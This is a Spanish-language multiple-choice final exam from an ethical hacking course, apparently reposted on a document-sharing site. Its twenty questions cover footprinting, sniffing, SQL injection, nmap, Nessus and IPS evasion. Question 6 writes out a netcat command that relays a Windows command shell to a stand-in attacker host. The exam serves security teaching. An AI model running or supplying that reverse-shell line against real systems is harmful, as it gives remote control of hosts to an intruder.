Examen De Etical Hacking

  • Uploaded by: Marlon Altamirano
  • 0
  • 0
  • June 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Examen De Etical Hacking as PDF for free.

More details

  • Words: 899
  • Pages: 2
Examen Final Curso :

Ethical Hacking

Nombre del Alumno : ...................................................................................................... Fecha : 21-22/9/09

Indicaciones : A. Marcar las alternativas seleccionadas con un circulo alrededor de cada opción. B. Considerar siempre la(s) alternativa(s) correcta(s) o la(s) mejor(es) alternativa(s). C. El examen es individual. D. La duración del examen es de 20 minutos. 1. En un exploit hecho en C Ud. encuentra una sección llena de códigos en hexadecimal (\x##), esta seccion corresponde a : A. La DLL que se explotará. B. La firma que deja el exploit. C. Padding. D. El shellcode. 2. Dónde debería buscar un evaluador de seguridad la información que podría ser usada por un atacante contra una organización ? (Seleccionar todas las que aplican) A. Salones de chat. B. Bases de datos WHOIS. C. Grupos de Noticias. D. Sitios Web. E. Motores de búsqueda. F. El propio sitio web de la organización. 3. Cuáles de las siguientes actividades NO es considerada footprint pasivo ?(Seleccionar todas las que aplican) A. Buscar dentro de la basura para encontrar información que ha sido descartada. B. Buscar en el sitio financiero de Yahoo Financial para encontrar activos. C. Escanear un rango de direcciones IP que se encontraron en la base de datos DNS. D. Ejecutar múltiples búsquedas usando motores de búsquedas. 4. Durante el footprint de una red, qué puerto indica la posibilidad de hacer una transferencia de zona ? A. 53 UDP B. 53 TCP C. 25 UDP D. 25 TCP E. 161 UDP F. 22 TCP G. 60 TCP 5. Mientras se ejecuta un ping sweep en una subred, se reciben respuestas ICMP Código 3 Tipo 13 para todos los pings enviados. Cuál es la causa más frecuente para obtener esta respuesta ? A. El firewall esta rechazando los paquetes. B. Un IDS-inlines esta rechazando los paquetes. C. Un router en el ISP esta bloqueando ICMP con ACLs. D. El host no responde a paquetes ICMP. 6. La línea nc ip_attacker 80 | cmd.exe | nc ip_attacker 25 corresponde al uso de netcat para A. Un canal encubierto. B. Un escaneo de puertos. C. Descarga de un archivo. D. RFI/LFI 7. En Linux, cuáles son los 3 comandos más comúnes que los hackers usualmente “troyanizan” : A. car, xterm, grep B. netstat, ps, top C. vmware, sed, less D. xterm, ps, nc 8. Fidia fue contratada para ejecutar una evaluación de seguridad interna. Rapidamente se da cuenta que usan switches en vez de hubs. Esto la limita en su habilidad para obtener información mediante el sniffing de la red. Cuál de las siguientes técnicas puede usar Fidia para obtener información de una red basada en switches o para deshabilitar alguna de las características de aislamiento de los switches ? (Escoja 2) A. Ethernet Zapping B. MAC Flooding C. Sniffing en modo promiscuo D. ARP Spoofing

9. Julio ha sido contratado para evaluar la seguridad de una aplicación web. Julio se da cuenta que el sitio es dinámico e infiere que deben estar haciendo uso de una base de datos como backend de la aplicación. Julio quiere validar sí es posible hacer una inyección de SQL. Cuál es el primer caracter que Julio debería usar para intentar quebrar los requerimientos SQL ? A. Semi Column B. Double Quote C. Single Quote D. Exclamation Mark 10. En qué modo debe operar una tarjeta de red para realizar un sniffing ? A. Compartido. B. Sin Encriptación. C. Abierto. D. Promiscuo. 11. Un Idle Scan es una función propia de : A. nmap B. scapy C. hping D. todos los anteriores 12. Ud. requiere validar los parches instalados en un MS Windows, la funcionalidad de Local Security Checks le sirve para esta validación A. SI B. NO 13. El URL http://1209882139 es válido A. SI B. NO 14. Ud. se encuentra en la búsqueda de exploits de una fuente aproximadamente confiable, cual de estas puede ser A. cve.mitre.org B. www.kartoo.org C. ww.milw0rm.com D. www.open-sec.com 15. En la explotación de una vulnerabilidad, que describe mejor al payload A. Sección que realiza el buffer overflow B. Sección que prepara el target C. Sección que implementa el ataque, por ejemplo, un shell reverso D. Sección que realiza la evasión de intrusos 16. En que puerto escucha por default Paros A. 3128 B. 8080 C. 31337 D. 8000 17. Cual es la opción que se debe activar en Nessus para evitar afectar la disponibilidad de los hosts que se evaluan A. No DoS B. Secure Checks C. Safe Checks D. Prevent Insane Checks 18. Que tipo de Flag TCP no es valido A. ACK B. SYN C. RST D. END 19. Ud. tiene acceso a un host Linux como un usuario simple y tiene instalado nmap en forma correcta y operativa, ejecuta : nmap -v -sS 192.168.254.209 y obtiene un mensaje de error y no ejecuta el programa, cual es la causa mas frecuente ? A. Es una versión antigua de nmap B. Se requiere acceso como administrator C. Se requiere tener privelegios de root D. Esta pasando por un firewall de host 20. Ud. quiere evitar ser bloqueado por un IPS mientras realiza un ethical hacking, que medida no es adecuada en estas situaciones A. Usar Unicorn porque hace el escaneo más rápido B. No escanear los puertos más usados porque siempre estan protegidos C. Fragmentar los paquetes que se envian D. Preguntar al admin de la red cuáles son las aplicaciones que utiliza

Related Documents

Hacking
November 2019 35
Hacking
November 2019 34
Hacking
April 2020 26
Hacking
May 2020 24
Hacking
October 2019 40

More Documents from "Mvondo"